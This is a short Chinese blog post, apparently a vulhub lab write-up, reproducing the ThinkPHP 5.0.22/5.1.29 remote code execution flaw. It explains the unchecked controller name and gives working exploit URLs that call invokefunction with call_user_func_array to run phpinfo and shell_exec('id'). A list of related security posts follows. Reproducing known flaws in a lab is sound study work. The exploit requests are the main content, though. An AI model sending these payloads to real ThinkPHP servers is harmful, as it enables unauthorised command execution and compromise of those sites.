vulhub中ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现

ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

1.环境启动后,访问http://your-ip:8080即可看到ThinkPHP默认启动页面。

2.直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo:

复制代码
http://192.168.188.139:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id
相关推荐
捉鸭子14 小时前
某音a_bogus vmp逆向
爬虫·python·web安全·node.js·js
钟智强17 小时前
潜伏 9 年的 Linux 核弹级漏洞:CopyFail CVE-2026-31431
linux·数据库·web安全
蜡笔小新拯救世界18 小时前
部分安全笔记总结
linux·网络·web安全
薪火铺子19 小时前
常见Web安全漏洞防护
安全·web安全
Chockmans20 小时前
春秋云境CVE-2015-6522
安全·web安全·网络安全·网络攻击模型·安全威胁分析·春秋云境·cve-2015-6522
Bruce_Liuxiaowei1 天前
2026年4月第5周网络安全形势周报
人工智能·安全·web安全·网络安全·大模型
德迅云安全杨德俊1 天前
DDoS 解析与防御体系
网络·安全·web安全·ddos
王大傻09282 天前
WASC 团队报告的安全威胁分类
网络·安全·web安全
橘子海全栈攻城狮2 天前
【最新源码】养老院系统管理A013
java·spring boot·后端·web安全·微信小程序
王大傻09282 天前
注入攻击的概念
web安全·网络安全